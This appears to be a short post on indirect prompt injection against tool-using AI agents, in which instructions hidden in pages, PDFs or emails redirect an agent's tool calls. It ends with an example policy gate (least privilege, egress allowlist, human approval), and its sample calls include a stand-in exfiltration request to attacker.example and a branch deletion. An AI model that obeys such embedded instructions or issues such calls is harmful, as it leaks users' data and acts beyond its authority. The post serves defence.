Researchers demonstrate indirect prompt injection that hijacks tool-using AI agents
A new write-up shows how a poisoned web page or document can silently redirect an autonomous agent's tool calls — exfiltrating data or triggering unintended actions — without the user noticing.
This is the threat model for anything agentic — including build-and-deploy pipelines. The mitigation isn't a better prompt; it's least-privilege tools, egress control, and a human gate before consequential actions. Exactly why our build agents run sandboxed.
Indirect prompt injection embeds adversarial instructions in content the agent reads (a page, a PDF, an email), which the model then treats as trusted input and acts on.
Because the malicious instruction rides in data rather than the user's prompt, traditional input validation misses it. The blast radius is whatever tools and credentials the agent holds.
Defenses that actually work are architectural: scope each tool to least privilege, sandbox execution, restrict network egress, and require human approval before anything irreversible or public. Treat the model as an untrusted component in the system.
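The architectural controls above can be enforced outside the model as a policy gate that every tool call passes through. The following is an added illustration, not code from the write-up or from any product; the tool names, hosts and the `ToolGate`/`Decision` classes are this example's own assumptions, and the sample calls are constructed to mimic what an injected page might make an agent emit.

```python
"""Added example: policy gate in front of an agent's tool calls.
Each tool carries a least-privilege scope, outbound URLs must match the
tool's egress allowlist, and consequential actions are parked for human
approval instead of running. All names here are illustrative."""
from dataclasses import dataclass
from urllib.parse import urlparse

@dataclass
class Tool:
    name: str
    consequential: bool                      # irreversible/public -> human gate
    allowed_hosts: frozenset = frozenset()   # egress allowlist; empty = no network

@dataclass
class Decision:
    action: str    # "run" | "block" | "hold_for_approval"
    reason: str

class ToolGate:
    def __init__(self, tools):
        self.tools = {t.name: t for t in tools}   # only tools granted to this agent
        self.pending = []                          # actions awaiting a human decision

    def check(self, call_name, args) -> Decision:
        tool = self.tools.get(call_name)
        if tool is None:                           # least privilege: ungranted tool
            return Decision("block", f"tool '{call_name}' not granted to this agent")
        url = args.get("url")
        if url is not None:                        # egress control
            host = urlparse(url).hostname or ""
            if host not in tool.allowed_hosts:
                return Decision("block", f"egress to '{host}' not on allowlist")
        if tool.consequential:                     # human gate before irreversible acts
            self.pending.append((call_name, args))
            return Decision("hold_for_approval", "consequential action awaits approval")
        return Decision("run", "within policy")

# Constructed sample: tool calls an agent might emit after reading a poisoned page.
AGENT = ToolGate([
    Tool("read_repo", consequential=False),
    Tool("http_get", consequential=False, allowed_hosts=frozenset({"api.internal.example"})),
    Tool("deploy", consequential=True),
])
INJECTED_CALLS = [
    ("http_get", {"url": "https://api.internal.example/status"}),        # legitimate
    ("http_get", {"url": "https://attacker.example/collect?d=secrets"}),  # injected exfil attempt
    ("delete_branch", {"name": "main"}),                                   # tool never granted
    ("deploy", {"target": "prod"}),                                        # gated, not executed
]

def evaluate(gate, calls):
    """Return the gate's decision for each call, in order."""
    return [gate.check(name, args).action for name, args in calls]
```

Logging each `block` and `hold_for_approval` decision with the originating content source gives the detection signal the post calls for: a burst of blocked egress right after the agent ingested an untrusted document is the injection showing itself.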